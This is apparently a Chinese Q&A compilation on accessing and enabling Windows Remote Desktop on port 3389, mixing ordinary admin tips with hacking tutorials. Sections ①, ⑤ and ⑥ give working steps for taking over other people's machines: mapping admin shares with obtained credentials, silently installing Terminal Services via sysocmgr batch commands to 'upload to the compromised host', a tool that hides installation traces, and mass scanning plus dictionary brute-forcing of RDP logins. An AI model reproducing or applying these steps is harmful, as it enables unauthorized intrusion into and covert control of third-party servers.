如何进入3389服务器

① 怎么开启对方的3389端口

得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件,
是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法.

首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分
产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过.
我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多).

现在开始.

假设我们拿到了一个主机的管理员帐户和密码.
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:\winnt下

从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来
判断此主机是专业版还是服务器版,才能进入下一个环节.

我们可以先用对方所开帐户判断:

c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
--------------------------

一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的.

我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口
判断对方是否开启25,3372等2000server默认开启的端口.

当然我们还可以使用一些工具,如:cmdinfo.zip
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一
系列信息,一个图形界面,一个命令行.
通过返回的信息就可以很清楚的了解对方主机情况.

还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了.

如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.

现在我们要进入下一环节:
判断终端服务到底有没有安装?

你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在"管理工具">>>"服务"中被禁用.
2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文)
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6.....(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况.

现在开始判组件是否被安装.

先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。

然后转到Z盘,检查
Z:\Documents and Settings\All Users\“开始”菜单\程序\管理工具>
里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.

判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:
telnet登陆对方主机,准备安装服务组件.

在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了.
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.

假如我们已开启对方23端口,
telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
\\成功进入!!!!

进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议.

不清楚行不行

② 如何登陆 3389 服务器

开始…运行…里面输入mstsc回车 输入你服务器的ip 连接上课输入用户密码即可

③ 我自己的服务器，需要打开3389端口怎么弄WIN2003

我的电脑，属性，远程，选择“允许用户远程连接到此计算机”，然后控制面板，windows防火墙例外“远程桌面”，或手动添加端口3389

④ 怎么样设置网站的3389服务器连接

你是指用网站域名连接还是直接是ip连接
或者是指这网站服务器开启远程连接的方法？
前者的话开启3389功能直接用域名跟ip都可以直接连接
后者的话需要登录服务器在里面开启3389功能

⑤ 怎么打开3389端口和相应的服务

怎么样开3389端口，这里我把他们总结一下，网上查到的，很全面,希望对你有用:
1，打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。

3，下载3389自动安装程序-djshao正式版5.0
说明：
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下，然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！

特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！

5，下载DameWare NT Utilities 3.66.0.0 注册版
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK

⑥ 如何利用3389端口攻破服务器

第一步：使用工具Dubrute中的Ipseacher进行搜索一些活跃的IP段，当然也会采用网络搜索的方法进行；接着就采用SYN扫描为了达到好的效果都会在server2003系统下进行扫描，只有在该系统下不能正常扫描的时候才会使用vmware虚拟机进行扫描；另外如果在XP系统下进行扫描的时候，他们往往会让先让XP能支持SYN的扫描，方法就是将支持这种扫描的补丁直接复制粘贴到系统盘下的driver，当电脑进行重启后就能进行扫描了。
第二步：将Ipseach下的IP段进行直接复制到SYN扫描器下的ip.txt中，当进行扫描一段时间后就能生出ips文档而这种ips文档IP事实上就是用户开启3389端口的实际IP；顺便业内专家也将brute工具中的英文操作给大家翻译下，能够帮助大家更好进行理解；source代表就为源、bad代表的酒味坏的、good代表的就是好的、error代表的就是错误的、check代表的就是检测、thread代表的就是线程、start代表的就是开始、config代表的就是配置、generation代表的就是生成、about代表的就是关于。
第三步：将直接导入需要攻破的3389IP地址，接着还会打开generation在打开后就能看到有3列需要进行手动输入的框，在第一列框中手动填写的就是需要攻破的服务器IP，而第二列框中填写的就是相关登陆账号一般就是administrator，在第三列中就是导入的3389密码字典，当点击male退出界面后，就能再点击config进行配置了。
第四步：当全部完成后就能点击start进行攻破了，这个时候在good后就会出现相关数字这就能代表攻破了多少数量的服务器，界面中的bad就代表正在check中当在brute下找到good文档进行打开，就能轻松查看到攻破服务器的登录账号和密码了。
第五步：依次点击电脑开始—运行项目，并在弹出框内输入mstsc-admin指令就能顺利进入3389登陆框，当输入IP连接上再输入账号密码就能直接登录成功了。

⑦ 如何通过3389进入我的服务器

3389要想传文件那可费劲了。还是用吧。端口21
3389登陆器xp自带，在运行输入mstsc

⑧ 不小心禁掉了云服务器3389端口，怎么远程打开

服务器装了杀软以后3389被关闭了。我又不想插显示器，怎么办呢。因为我知道用户名密码就想到了ipc$下面是详细过程
1.用ipc$连接服务器
net use \\192.168.150.90\ipc$ "password" /user:"administrator"
成功以后进行第二步
2.连接远程注册表准备开启远程服务器的3389端口
打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.150.90
这样就进入了远程主机注册表.
把[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\]
"fDenyTSConnections"=dword:00000001
改成"fDenyTSConnections"=dword:00000000
如果连接远程注册表的时候报错“ 法连接192.168.150.90，请确定该机在网络上，其远程管理程序已被启用，并且两台计算机使用统一注册表服务”的话请转第三步
3.如果报第二步的错误，是 为远程主机的remote registry这个服务没有打开。如何打开呢

右击我的电脑--管理---右击-----》计算机管理（本地）----连接到另一台计算机---输入192.168.150.90.连接上之后我们就可以开启150.90这台服务器的remote registry服务了，然后我们再按照第二步的办法就可以成功打开这台服务器的远程桌面了。
是不是很简单呢?
不懂得话可以联系tjyundingyun